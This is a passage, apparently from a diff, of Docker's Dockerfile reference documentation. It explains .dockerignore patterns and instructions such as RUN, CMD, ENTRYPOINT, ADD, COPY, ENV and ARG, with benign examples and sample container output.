/bar - COPY \$foo /quux # COPY $foo /quux - -Environment variables are supported by the following list of instructions in -the `Dockerfile`: - -* `ADD` -* `COPY` -* `ENV` -* `EXPOSE` -* `LABEL` -* `USER` -* `WORKDIR` -* `VOLUME` -* `STOPSIGNAL` - -as well as: - -* `ONBUILD` (when combined with one of the supported instructions above) - -> **Note**: -> prior to 1.4, `ONBUILD` instructions did **NOT** support environment -> variable, even when combined with any of the instructions listed above. - -Environment variable substitution will use the same value for each variable -throughout the entire command. In other words, in this example: - - ENV abc=hello - ENV abc=bye def=$abc - ENV ghi=$abc - -will result in `def` having a value of `hello`, not `bye`. However, -`ghi` will have a value of `bye` because it is not part of the same command -that set `abc` to `bye`. - -## .dockerignore file - -Before the docker CLI sends the context to the docker daemon, it looks -for a file named `.dockerignore` in the root directory of the context. -If this file exists, the CLI modifies the context to exclude files and -directories that match patterns in it. This helps to avoid -unnecessarily sending large or sensitive files and directories to the -daemon and potentially adding them to images using `ADD` or `COPY`. - -The CLI interprets the `.dockerignore` file as a newline-separated -list of patterns similar to the file globs of Unix shells. For the -purposes of matching, the root of the context is considered to be both -the working and the root directory. For example, the patterns -`/foo/bar` and `foo/bar` both exclude a file or directory named `bar` -in the `foo` subdirectory of `PATH` or in the root of the git -repository located at `URL`. Neither excludes anything else. - -If a line in `.dockerignore` file starts with `#` in column 1, then this line is -considered as a comment and is ignored before interpreted by the CLI. 
- -Here is an example `.dockerignore` file: - -``` -# comment - */temp* - */*/temp* - temp? -``` - -This file causes the following build behavior: - -| Rule | Behavior | -|----------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `# comment` | Ignored. | -| `*/temp*` | Exclude files and directories whose names start with `temp` in any immediate subdirectory of the root. For example, the plain file `/somedir/temporary.txt` is excluded, as is the directory `/somedir/temp`. | -| `*/*/temp*` | Exclude files and directories starting with `temp` from any subdirectory that is two levels below the root. For example, `/somedir/subdir/temporary.txt` is excluded. | -| `temp?` | Exclude files and directories in the root directory whose names are a one-character extension of `temp`. For example, `/tempa` and `/tempb` are excluded. - - -Matching is done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. A -preprocessing step removes leading and trailing whitespace and -eliminates `.` and `..` elements using Go's -[filepath.Clean](http://golang.org/pkg/path/filepath/#Clean). Lines -that are blank after preprocessing are ignored. - -Beyond Go's filepath.Match rules, Docker also supports a special -wildcard string `**` that matches any number of directories (including -zero). For example, `**/*.go` will exclude all files that end with `.go` -that are found in all directories, including the root of the build context. - -Lines starting with `!` (exclamation mark) can be used to make exceptions -to exclusions. The following is an example `.dockerignore` file that -uses this mechanism: - -``` - *.md - !README.md -``` - -All markdown files *except* `README.md` are excluded from the context. 
- -The placement of `!` exception rules influences the behavior: the last -line of the `.dockerignore` that matches a particular file determines -whether it is included or excluded. Consider the following example: - -``` - *.md - !README*.md - README-secret.md -``` - -No markdown files are included in the context except README files other than -`README-secret.md`. - -Now consider this example: - -``` - *.md - README-secret.md - !README*.md -``` - -All of the README files are included. The middle line has no effect because -`!README*.md` matches `README-secret.md` and comes last. - -You can even use the `.dockerignore` file to exclude the `Dockerfile` -and `.dockerignore` files. These files are still sent to the daemon -because it needs them to do its job. But the `ADD` and `COPY` commands -do not copy them to the image. - -Finally, you may want to specify which files to include in the -context, rather than which to exclude. To achieve this, specify `*` as -the first pattern, followed by one or more `!` exception patterns. - -**Note**: For historical reasons, the pattern `.` is ignored. - -## FROM - - FROM - -Or - - FROM : - -Or - - FROM @ - -The `FROM` instruction sets the [*Base Image*](glossary.md#base-image) -for subsequent instructions. As such, a valid `Dockerfile` must have `FROM` as -its first instruction. The image can be any valid image – it is especially easy -to start by **pulling an image** from the [*Public Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/). - -- `FROM` must be the first non-comment instruction in the `Dockerfile`. - -- `FROM` can appear multiple times within a single `Dockerfile` in order to create -multiple images. Simply make a note of the last image ID output by the commit -before each new `FROM` command. - -- The `tag` or `digest` values are optional. If you omit either of them, the builder -assumes a `latest` by default. The builder returns an error if it cannot match -the `tag` value. 
- -## RUN - -RUN has 2 forms: - -- `RUN ` (*shell* form, the command is run in a shell, which by -default is `/bin/sh -c` on Linux or `cmd /S /C` on Windows) -- `RUN ["executable", "param1", "param2"]` (*exec* form) - -The `RUN` instruction will execute any commands in a new layer on top of the -current image and commit the results. The resulting committed image will be -used for the next step in the `Dockerfile`. - -Layering `RUN` instructions and generating commits conforms to the core -concepts of Docker where commits are cheap and containers can be created from -any point in an image's history, much like source control. - -The *exec* form makes it possible to avoid shell string munging, and to `RUN` -commands using a base image that does not contain the specified shell executable. - -The default shell for the *shell* form can be changed using the `SHELL` -command. - -In the *shell* form you can use a `\` (backslash) to continue a single -RUN instruction onto the next line. For example, consider these two lines: - -``` -RUN /bin/bash -c 'source $HOME/.bashrc; \ -echo $HOME' -``` -Together they are equivalent to this single line: - -``` -RUN /bin/bash -c 'source $HOME/.bashrc; echo $HOME' -``` - -> **Note**: -> To use a different shell, other than '/bin/sh', use the *exec* form -> passing in the desired shell. For example, -> `RUN ["/bin/bash", "-c", "echo hello"]` - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `RUN [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `RUN [ "sh", "-c", "echo $HOME" ]`. 
-> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. -> -> **Note**: -> In the *JSON* form, it is necessary to escape backslashes. This is -> particularly relevant on Windows where the backslash is the path separator. -> The following line would otherwise be treated as *shell* form due to not -> being valid JSON, and fail in an unexpected way: -> `RUN ["c:\windows\system32\tasklist.exe"]` -> The correct syntax for this example is: -> `RUN ["c:\\windows\\system32\\tasklist.exe"]` - -The cache for `RUN` instructions isn't invalidated automatically during -the next build. The cache for an instruction like -`RUN apt-get dist-upgrade -y` will be reused during the next build. The -cache for `RUN` instructions can be invalidated by using the `--no-cache` -flag, for example `docker build --no-cache`. - -See the [`Dockerfile` Best Practices -guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. - -The cache for `RUN` instructions can be invalidated by `ADD` instructions. See -[below](#add) for details. - -### Known issues (RUN) - -- [Issue 783](https://github.com/docker/docker/issues/783) is about file - permissions problems that can occur when using the AUFS file system. You - might notice it during an attempt to `rm` a file, for example. - - For systems that have recent aufs version (i.e., `dirperm1` mount option can - be set), docker will attempt to fix the issue automatically by mounting - the layers with `dirperm1` option. More details on `dirperm1` option can be - found at [`aufs` man page](https://github.com/sfjro/aufs3-linux/tree/aufs3.18/Documentation/filesystems/aufs) - - If your system doesn't have support for `dirperm1`, the issue describes a workaround. 
- -## CMD - -The `CMD` instruction has three forms: - -- `CMD ["executable","param1","param2"]` (*exec* form, this is the preferred form) -- `CMD ["param1","param2"]` (as *default parameters to ENTRYPOINT*) -- `CMD command param1 param2` (*shell* form) - -There can only be one `CMD` instruction in a `Dockerfile`. If you list more than one `CMD` -then only the last `CMD` will take effect. - -**The main purpose of a `CMD` is to provide defaults for an executing -container.** These defaults can include an executable, or they can omit -the executable, in which case you must specify an `ENTRYPOINT` -instruction as well. - -> **Note**: -> If `CMD` is used to provide default arguments for the `ENTRYPOINT` -> instruction, both the `CMD` and `ENTRYPOINT` instructions should be specified -> with the JSON array format. - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `CMD [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `CMD [ "sh", "-c", "echo $HOME" ]`. -> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. - -When used in the shell or exec formats, the `CMD` instruction sets the command -to be executed when running the image. - -If you use the *shell* form of the `CMD`, then the `` will execute in -`/bin/sh -c`: - - FROM ubuntu - CMD echo "This is a test." | wc - - -If you want to **run your** `` **without a shell** then you must -express the command as a JSON array and give the full path to the executable. 
-**This array form is the preferred format of `CMD`.** Any additional parameters -must be individually expressed as strings in the array: - - FROM ubuntu - CMD ["/usr/bin/wc","--help"] - -If you would like your container to run the same executable every time, then -you should consider using `ENTRYPOINT` in combination with `CMD`. See -[*ENTRYPOINT*](#entrypoint). - -If the user specifies arguments to `docker run` then they will override the -default specified in `CMD`. - -> **Note**: -> Don't confuse `RUN` with `CMD`. `RUN` actually runs a command and commits -> the result; `CMD` does not execute anything at build time, but specifies -> the intended command for the image. - -## LABEL - - LABEL = = = ... - -The `LABEL` instruction adds metadata to an image. A `LABEL` is a -key-value pair. To include spaces within a `LABEL` value, use quotes and -backslashes as you would in command-line parsing. A few usage examples: - - LABEL "com.example.vendor"="ACME Incorporated" - LABEL com.example.label-with-value="foo" - LABEL version="1.0" - LABEL description="This text illustrates \ - that label-values can span multiple lines." - -An image can have more than one label. To specify multiple labels, -Docker recommends combining labels into a single `LABEL` instruction where -possible. Each `LABEL` instruction produces a new layer which can result in an -inefficient image if you use many labels. This example results in a single image -layer. - - LABEL multi.label1="value1" multi.label2="value2" other="value3" - -The above can also be written as: - - LABEL multi.label1="value1" \ - multi.label2="value2" \ - other="value3" - -Labels are additive including `LABEL`s in `FROM` images. If Docker -encounters a label/key that already exists, the new value overrides any previous -labels with identical keys. - -To view an image's labels, use the `docker inspect` command. 
- - "Labels": { - "com.example.vendor": "ACME Incorporated" - "com.example.label-with-value": "foo", - "version": "1.0", - "description": "This text illustrates that label-values can span multiple lines.", - "multi.label1": "value1", - "multi.label2": "value2", - "other": "value3" - }, - -## MAINTAINER (deprecated) - - MAINTAINER - -The `MAINTAINER` instruction sets the *Author* field of the generated images. -The `LABEL` instruction is a much more flexible version of this and you should use -it instead, as it enables setting any metadata you require, and can be viewed -easily, for example with `docker inspect`. To set a label corresponding to the -`MAINTAINER` field you could use: - - LABEL maintainer "SvenDowideit@home.org.au" - -This will then be visible from `docker inspect` with the other labels. - -## EXPOSE - - EXPOSE [...] - -The `EXPOSE` instruction informs Docker that the container listens on the -specified network ports at runtime. `EXPOSE` does not make the ports of the -container accessible to the host. To do that, you must use either the `-p` flag -to publish a range of ports or the `-P` flag to publish all of the exposed -ports. You can expose one port number and publish it externally under another -number. - -To set up port redirection on the host system, see [using the -P -flag](run.md#expose-incoming-ports). The Docker network feature supports -creating networks without the need to expose ports within the network, for -detailed information see the [overview of this -feature](https://docs.docker.com/engine/userguide/networking/)). - -## ENV - - ENV - ENV = ... - -The `ENV` instruction sets the environment variable `` to the value -``. This value will be in the environment of all "descendant" -`Dockerfile` commands and can be [replaced inline](#environment-replacement) in -many as well. - -The `ENV` instruction has two forms. The first form, `ENV `, -will set a single variable to a value. 
The entire string after the first -space will be treated as the `` - including characters such as -spaces and quotes. - -The second form, `ENV = ...`, allows for multiple variables to -be set at one time. Notice that the second form uses the equals sign (=) -in the syntax, while the first form does not. Like command line parsing, -quotes and backslashes can be used to include spaces within values. - -For example: - - ENV myName="John Doe" myDog=Rex\ The\ Dog \ - myCat=fluffy - -and - - ENV myName John Doe - ENV myDog Rex The Dog - ENV myCat fluffy - -will yield the same net results in the final image, but the first form -is preferred because it produces a single cache layer. - -The environment variables set using `ENV` will persist when a container is run -from the resulting image. You can view the values using `docker inspect`, and -change them using `docker run --env =`. - -> **Note**: -> Environment persistence can cause unexpected side effects. For example, -> setting `ENV DEBIAN_FRONTEND noninteractive` may confuse apt-get -> users on a Debian-based image. To set a value for a single command, use -> `RUN = `. - -## ADD - -ADD has two forms: - -- `ADD ... ` -- `ADD ["",... ""]` (this form is required for paths containing -whitespace) - -The `ADD` instruction copies new files, directories or remote file URLs from `` -and adds them to the filesystem of the image at the path ``. - -Multiple `` resource may be specified but if they are files or -directories then they must be relative to the source directory that is -being built (the context of the build). - -Each `` may contain wildcards and matching will be done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: - - ADD hom* /mydir/ # adds all files starting with "hom" - ADD hom?.txt /mydir/ # ? 
is replaced with any single character, e.g., "home.txt" - -The `` is an absolute path, or a path relative to `WORKDIR`, into which -the source will be copied inside the destination container. - - ADD test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ - ADD test /absoluteDir/ # adds "test" to /absoluteDir/ - -All new files and directories are created with a UID and GID of 0. - -In the case where `` is a remote file URL, the destination will -have permissions of 600. If the remote file being retrieved has an HTTP -`Last-Modified` header, the timestamp from that header will be used -to set the `mtime` on the destination file. However, like any other file -processed during an `ADD`, `mtime` will not be included in the determination -of whether or not the file has changed and the cache should be updated. - -> **Note**: -> If you build by passing a `Dockerfile` through STDIN (`docker -> build - < somefile`), there is no build context, so the `Dockerfile` -> can only contain a URL based `ADD` instruction. You can also pass a -> compressed archive through STDIN: (`docker build - < archive.tar.gz`), -> the `Dockerfile` at the root of the archive and the rest of the -> archive will be used as the context of the build. - -> **Note**: -> If your URL files are protected using authentication, you -> will need to use `RUN wget`, `RUN curl` or use another tool from -> within the container as the `ADD` instruction does not support -> authentication. - -> **Note**: -> The first encountered `ADD` instruction will invalidate the cache for all -> following instructions from the Dockerfile if the contents of `` have -> changed. This includes invalidating the cache for `RUN` instructions. -> See the [`Dockerfile` Best Practices -guide](https://docs.docker.com/engine/userguide/eng-image/dockerfile_best-practices/#/build-cache) for more information. 
- - -`ADD` obeys the following rules: - -- The `` path must be inside the *context* of the build; - you cannot `ADD ../something /something`, because the first step of a - `docker build` is to send the context directory (and subdirectories) to the - docker daemon. - -- If `` is a URL and `` does not end with a trailing slash, then a - file is downloaded from the URL and copied to ``. - -- If `` is a URL and `` does end with a trailing slash, then the - filename is inferred from the URL and the file is downloaded to - `/`. For instance, `ADD http://example.com/foobar /` would - create the file `/foobar`. The URL must have a nontrivial path so that an - appropriate filename can be discovered in this case (`http://example.com` - will not work). - -- If `` is a directory, the entire contents of the directory are copied, - including filesystem metadata. - -> **Note**: -> The directory itself is not copied, just its contents. - -- If `` is a *local* tar archive in a recognized compression format - (identity, gzip, bzip2 or xz) then it is unpacked as a directory. Resources - from *remote* URLs are **not** decompressed. When a directory is copied or - unpacked, it has the same behavior as `tar -x`, the result is the union of: - - 1. Whatever existed at the destination path and - 2. The contents of the source tree, with conflicts resolved in favor - of "2." on a file-by-file basis. - - > **Note**: - > Whether a file is identified as a recognized compression format or not - > is done solely based on the contents of the file, not the name of the file. - > For example, if an empty file happens to end with `.tar.gz` this will not - > be recognized as a compressed file and **will not** generate any kind of - > decompression error message, rather the file will simply be copied to the - > destination. - -- If `` is any other kind of file, it is copied individually along with - its metadata. 
In this case, if `` ends with a trailing slash `/`, it - will be considered a directory and the contents of `` will be written - at `/base()`. - -- If multiple `` resources are specified, either directly or due to the - use of a wildcard, then `` must be a directory, and it must end with - a slash `/`. - -- If `` does not end with a trailing slash, it will be considered a - regular file and the contents of `` will be written at ``. - -- If `` doesn't exist, it is created along with all missing directories - in its path. - -## COPY - -COPY has two forms: - -- `COPY ... ` -- `COPY ["",... ""]` (this form is required for paths containing -whitespace) - -The `COPY` instruction copies new files or directories from `` -and adds them to the filesystem of the container at the path ``. - -Multiple `` resource may be specified but they must be relative -to the source directory that is being built (the context of the build). - -Each `` may contain wildcards and matching will be done using Go's -[filepath.Match](http://golang.org/pkg/path/filepath#Match) rules. For example: - - COPY hom* /mydir/ # adds all files starting with "hom" - COPY hom?.txt /mydir/ # ? is replaced with any single character, e.g., "home.txt" - -The `` is an absolute path, or a path relative to `WORKDIR`, into which -the source will be copied inside the destination container. - - COPY test relativeDir/ # adds "test" to `WORKDIR`/relativeDir/ - COPY test /absoluteDir/ # adds "test" to /absoluteDir/ - -All new files and directories are created with a UID and GID of 0. - -> **Note**: -> If you build using STDIN (`docker build - < somefile`), there is no -> build context, so `COPY` can't be used. - -`COPY` obeys the following rules: - -- The `` path must be inside the *context* of the build; - you cannot `COPY ../something /something`, because the first step of a - `docker build` is to send the context directory (and subdirectories) to the - docker daemon. 
- -- If `` is a directory, the entire contents of the directory are copied, - including filesystem metadata. - -> **Note**: -> The directory itself is not copied, just its contents. - -- If `` is any other kind of file, it is copied individually along with - its metadata. In this case, if `` ends with a trailing slash `/`, it - will be considered a directory and the contents of `` will be written - at `/base()`. - -- If multiple `` resources are specified, either directly or due to the - use of a wildcard, then `` must be a directory, and it must end with - a slash `/`. - -- If `` does not end with a trailing slash, it will be considered a - regular file and the contents of `` will be written at ``. - -- If `` doesn't exist, it is created along with all missing directories - in its path. - -## ENTRYPOINT - -ENTRYPOINT has two forms: - -- `ENTRYPOINT ["executable", "param1", "param2"]` - (*exec* form, preferred) -- `ENTRYPOINT command param1 param2` - (*shell* form) - -An `ENTRYPOINT` allows you to configure a container that will run as an executable. - -For example, the following will start nginx with its default content, listening -on port 80: - - docker run -i -t --rm -p 80:80 nginx - -Command line arguments to `docker run ` will be appended after all -elements in an *exec* form `ENTRYPOINT`, and will override all elements specified -using `CMD`. -This allows arguments to be passed to the entry point, i.e., `docker run -d` -will pass the `-d` argument to the entry point. -You can override the `ENTRYPOINT` instruction using the `docker run --entrypoint` -flag. - -The *shell* form prevents any `CMD` or `run` command line arguments from being -used, but has the disadvantage that your `ENTRYPOINT` will be started as a -subcommand of `/bin/sh -c`, which does not pass signals. -This means that the executable will not be the container's `PID 1` - and -will _not_ receive Unix signals - so your executable will not receive a -`SIGTERM` from `docker stop `. 
- -Only the last `ENTRYPOINT` instruction in the `Dockerfile` will have an effect. - -### Exec form ENTRYPOINT example - -You can use the *exec* form of `ENTRYPOINT` to set fairly stable default commands -and arguments and then use either form of `CMD` to set additional defaults that -are more likely to be changed. - - FROM ubuntu - ENTRYPOINT ["top", "-b"] - CMD ["-c"] - -When you run the container, you can see that `top` is the only process: - - $ docker run -it --rm --name test top -H - top - 08:25:00 up 7:27, 0 users, load average: 0.00, 0.01, 0.05 - Threads: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie - %Cpu(s): 0.1 us, 0.1 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st - KiB Mem: 2056668 total, 1616832 used, 439836 free, 99352 buffers - KiB Swap: 1441840 total, 0 used, 1441840 free. 1324440 cached Mem - - PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND - 1 root 20 0 19744 2336 2080 R 0.0 0.1 0:00.04 top - -To examine the result further, you can use `docker exec`: - - $ docker exec -it test ps aux - USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND - root 1 2.6 0.1 19752 2352 ? Ss+ 08:24 0:00 top -b -H - root 7 0.0 0.1 15572 2164 ? R+ 08:25 0:00 ps aux - -And you can gracefully request `top` to shut down using `docker stop test`. 
- -The following `Dockerfile` shows using the `ENTRYPOINT` to run Apache in the -foreground (i.e., as `PID 1`): - -``` -FROM debian:stable -RUN apt-get update && apt-get install -y --force-yes apache2 -EXPOSE 80 443 -VOLUME ["/var/www", "/var/log/apache2", "/etc/apache2"] -ENTRYPOINT ["/usr/sbin/apache2ctl", "-D", "FOREGROUND"] -``` - -If you need to write a starter script for a single executable, you can ensure that -the final executable receives the Unix signals by using `exec` and `gosu` -commands: - -```bash -#!/bin/bash -set -e - -if [ "$1" = 'postgres' ]; then - chown -R postgres "$PGDATA" - - if [ -z "$(ls -A "$PGDATA")" ]; then - gosu postgres initdb - fi - - exec gosu postgres "$@" -fi - -exec "$@" -``` - -Lastly, if you need to do some extra cleanup (or communicate with other containers) -on shutdown, or are co-ordinating more than one executable, you may need to ensure -that the `ENTRYPOINT` script receives the Unix signals, passes them on, and then -does some more work: - -``` -#!/bin/sh -# Note: I've written this using sh so it works in the busybox container too - -# USE the trap if you need to also do manual cleanup after the service is stopped, -# or need to start multiple services in the one container -trap "echo TRAPed signal" HUP INT QUIT TERM - -# start service in background here -/usr/sbin/apachectl start - -echo "[hit enter key to exit] or run 'docker stop '" -read - -# stop service and clean up here -echo "stopping apache" -/usr/sbin/apachectl stop - -echo "exited $0" -``` - -If you run this image with `docker run -it --rm -p 80:80 --name test apache`, -you can then examine the container's processes with `docker exec`, or `docker top`, -and then ask the script to stop Apache: - -```bash -$ docker exec -it test ps aux -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND -root 1 0.1 0.0 4448 692 ? Ss+ 00:42 0:00 /bin/sh /run.sh 123 cmd cmd2 -root 19 0.0 0.2 71304 4440 ? 
Ss 00:42 0:00 /usr/sbin/apache2 -k start -www-data 20 0.2 0.2 360468 6004 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start -www-data 21 0.2 0.2 360468 6000 ? Sl 00:42 0:00 /usr/sbin/apache2 -k start -root 81 0.0 0.1 15572 2140 ? R+ 00:44 0:00 ps aux -$ docker top test -PID USER COMMAND -10035 root {run.sh} /bin/sh /run.sh 123 cmd cmd2 -10054 root /usr/sbin/apache2 -k start -10055 33 /usr/sbin/apache2 -k start -10056 33 /usr/sbin/apache2 -k start -$ /usr/bin/time docker stop test -test -real 0m 0.27s -user 0m 0.03s -sys 0m 0.03s -``` - -> **Note:** you can override the `ENTRYPOINT` setting using `--entrypoint`, -> but this can only set the binary to *exec* (no `sh -c` will be used). - -> **Note**: -> The *exec* form is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -> **Note**: -> Unlike the *shell* form, the *exec* form does not invoke a command shell. -> This means that normal shell processing does not happen. For example, -> `ENTRYPOINT [ "echo", "$HOME" ]` will not do variable substitution on `$HOME`. -> If you want shell processing then either use the *shell* form or execute -> a shell directly, for example: `ENTRYPOINT [ "sh", "-c", "echo $HOME" ]`. -> When using the exec form and executing a shell directly, as in the case for -> the shell form, it is the shell that is doing the environment variable -> expansion, not docker. - -### Shell form ENTRYPOINT example - -You can specify a plain string for the `ENTRYPOINT` and it will execute in `/bin/sh -c`. -This form will use shell processing to substitute shell environment variables, -and will ignore any `CMD` or `docker run` command line arguments. 
-To ensure that `docker stop` will signal any long running `ENTRYPOINT` executable -correctly, you need to remember to start it with `exec`: - - FROM ubuntu - ENTRYPOINT exec top -b - -When you run this image, you'll see the single `PID 1` process: - - $ docker run -it --rm --name test top - Mem: 1704520K used, 352148K free, 0K shrd, 0K buff, 140368121167873K cached - CPU: 5% usr 0% sys 0% nic 94% idle 0% io 0% irq 0% sirq - Load average: 0.08 0.03 0.05 2/98 6 - PID PPID USER STAT VSZ %VSZ %CPU COMMAND - 1 0 root R 3164 0% 0% top -b - -Which will exit cleanly on `docker stop`: - - $ /usr/bin/time docker stop test - test - real 0m 0.20s - user 0m 0.02s - sys 0m 0.04s - -If you forget to add `exec` to the beginning of your `ENTRYPOINT`: - - FROM ubuntu - ENTRYPOINT top -b - CMD --ignored-param1 - -You can then run it (giving it a name for the next step): - - $ docker run -it --name test top --ignored-param2 - Mem: 1704184K used, 352484K free, 0K shrd, 0K buff, 140621524238337K cached - CPU: 9% usr 2% sys 0% nic 88% idle 0% io 0% irq 0% sirq - Load average: 0.01 0.02 0.05 2/101 7 - PID PPID USER STAT VSZ %VSZ %CPU COMMAND - 1 0 root S 3168 0% 0% /bin/sh -c top -b cmd cmd2 - 7 1 root R 3164 0% 0% top -b - -You can see from the output of `top` that the specified `ENTRYPOINT` is not `PID 1`. - -If you then run `docker stop test`, the container will not exit cleanly - the -`stop` command will be forced to send a `SIGKILL` after the timeout: - - $ docker exec -it test ps aux - PID USER COMMAND - 1 root /bin/sh -c top -b cmd cmd2 - 7 root top -b - 8 root ps aux - $ /usr/bin/time docker stop test - test - real 0m 10.19s - user 0m 0.04s - sys 0m 0.03s - -### Understand how CMD and ENTRYPOINT interact - -Both `CMD` and `ENTRYPOINT` instructions define what command gets executed when running a container. -There are few rules that describe their co-operation. - -1. Dockerfile should specify at least one of `CMD` or `ENTRYPOINT` commands. - -2. 
`ENTRYPOINT` should be defined when using the container as an executable. - -3. `CMD` should be used as a way of defining default arguments for an `ENTRYPOINT` command -or for executing an ad-hoc command in a container. - -4. `CMD` will be overridden when running the container with alternative arguments. - -The table below shows what command is executed for different `ENTRYPOINT` / `CMD` combinations: - -| | No ENTRYPOINT | ENTRYPOINT exec_entry p1_entry | ENTRYPOINT ["exec_entry", "p1_entry"] | -|--------------------------------|----------------------------|--------------------------------|------------------------------------------------| -| **No CMD** | *error, not allowed* | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry | -| **CMD ["exec_cmd", "p1_cmd"]** | exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry exec_cmd p1_cmd | -| **CMD ["p1_cmd", "p2_cmd"]** | p1_cmd p2_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry p1_cmd p2_cmd | -| **CMD exec_cmd p1_cmd** | /bin/sh -c exec_cmd p1_cmd | /bin/sh -c exec_entry p1_entry | exec_entry p1_entry /bin/sh -c exec_cmd p1_cmd | - -## VOLUME - - VOLUME ["/data"] - -The `VOLUME` instruction creates a mount point with the specified name -and marks it as holding externally mounted volumes from native host or other -containers. The value can be a JSON array, `VOLUME ["/var/log/"]`, or a plain -string with multiple arguments, such as `VOLUME /var/log` or `VOLUME /var/log -/var/db`. For more information/examples and mounting instructions via the -Docker client, refer to -[*Share Directories via Volumes*](https://docs.docker.com/engine/tutorials/dockervolumes/#/mount-a-host-directory-as-a-data-volume) -documentation. - -The `docker run` command initializes the newly created volume with any data -that exists at the specified location within the base image. 
For example, -consider the following Dockerfile snippet: - - FROM ubuntu - RUN mkdir /myvol - RUN echo "hello world" > /myvol/greeting - VOLUME /myvol - -This Dockerfile results in an image that causes `docker run`, to -create a new mount point at `/myvol` and copy the `greeting` file -into the newly created volume. - -> **Note**: -> If any build steps change the data within the volume after it has been -> declared, those changes will be discarded. - -> **Note**: -> The list is parsed as a JSON array, which means that -> you must use double-quotes (") around words not single-quotes ('). - -## USER - - USER daemon - -The `USER` instruction sets the user name or UID to use when running the image -and for any `RUN`, `CMD` and `ENTRYPOINT` instructions that follow it in the -`Dockerfile`. - -## WORKDIR - - WORKDIR /path/to/workdir - -The `WORKDIR` instruction sets the working directory for any `RUN`, `CMD`, -`ENTRYPOINT`, `COPY` and `ADD` instructions that follow it in the `Dockerfile`. -If the `WORKDIR` doesn't exist, it will be created even if it's not used in any -subsequent `Dockerfile` instruction. - -It can be used multiple times in the one `Dockerfile`. If a relative path -is provided, it will be relative to the path of the previous `WORKDIR` -instruction. For example: - - WORKDIR /a - WORKDIR b - WORKDIR c - RUN pwd - -The output of the final `pwd` command in this `Dockerfile` would be -`/a/b/c`. - -The `WORKDIR` instruction can resolve environment variables previously set using -`ENV`. You can only use environment variables explicitly set in the `Dockerfile`. -For example: - - ENV DIRPATH /path - WORKDIR $DIRPATH/$DIRNAME - RUN pwd - -The output of the final `pwd` command in this `Dockerfile` would be -`/path/$DIRNAME` - -## ARG - - ARG [=] - -The `ARG` instruction defines a variable that users can pass at build-time to -the builder with the `docker build` command using the `--build-arg =` -flag. 
If a user specifies a build argument that was not -defined in the Dockerfile, the build outputs a warning. - -``` -[Warning] One or more build-args [foo] were not consumed. -``` - -The Dockerfile author can define a single variable by specifying `ARG` once or many -variables by specifying `ARG` more than once. For example, a valid Dockerfile: - -``` -FROM busybox -ARG user1 -ARG buildno -... -``` - -A Dockerfile author may optionally specify a default value for an `ARG` instruction: - -``` -FROM busybox -ARG user1=someuser -ARG buildno=1 -... -``` - -If an `ARG` value has a default and if there is no value passed at build-time, the -builder uses the default. - -An `ARG` variable definition comes into effect from the line on which it is -defined in the `Dockerfile` not from the argument's use on the command-line or -elsewhere. For example, consider this Dockerfile: - -``` -1 FROM busybox -2 USER ${user:-some_user} -3 ARG user -4 USER $user -... -``` -A user builds this file by calling: - -``` -$ docker build --build-arg user=what_user Dockerfile -``` - -The `USER` at line 2 evaluates to `some_user` as the `user` variable is defined on the -subsequent line 3. The `USER` at line 4 evaluates to `what_user` as `user` is -defined and the `what_user` value was passed on the command line. Prior to its definition by an -`ARG` instruction, any use of a variable results in an empty string. - -> **Warning:** It is not recommended to use build-time variables for -> passing secrets like github keys, user credentials etc. Build-time variable -> values are visible to any user of the image with the `docker history` command. - -You can use an `ARG` or an `ENV` instruction to specify variables that are -available to the `RUN` instruction. Environment variables defined using the -`ENV` instruction always override an `ARG` instruction of the same name. Consider -this Dockerfile with an `ENV` and `ARG` instruction. 
- -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER v1.0.0 -4 RUN echo $CONT_IMG_VER -``` -Then, assume this image is built with this command: - -``` -$ docker build --build-arg CONT_IMG_VER=v2.0.1 Dockerfile -``` - -In this case, the `RUN` instruction uses `v1.0.0` instead of the `ARG` setting -passed by the user:`v2.0.1` This behavior is similar to a shell -script where a locally scoped variable overrides the variables passed as -arguments or inherited from environment, from its point of definition. - -Using the example above but a different `ENV` specification you can create more -useful interactions between `ARG` and `ENV` instructions: - -``` -1 FROM ubuntu -2 ARG CONT_IMG_VER -3 ENV CONT_IMG_VER ${CONT_IMG_VER:-v1.0.0} -4 RUN echo $CONT_IMG_VER -``` - -Unlike an `ARG` instruction, `ENV` values are always persisted in the built -image. Consider a docker build without the `--build-arg` flag: - -``` -$ docker build Dockerfile -``` - -Using this Dockerfile example, `CONT_IMG_VER` is still persisted in the image but -its value would be `v1.0.0` as it is the default set in line 3 by the `ENV` instruction. - -The variable expansion technique in this example allows you to pass arguments -from the command line and persist them in the final image by leveraging the -`ENV` instruction. Variable expansion is only supported for [a limited set of -Dockerfile 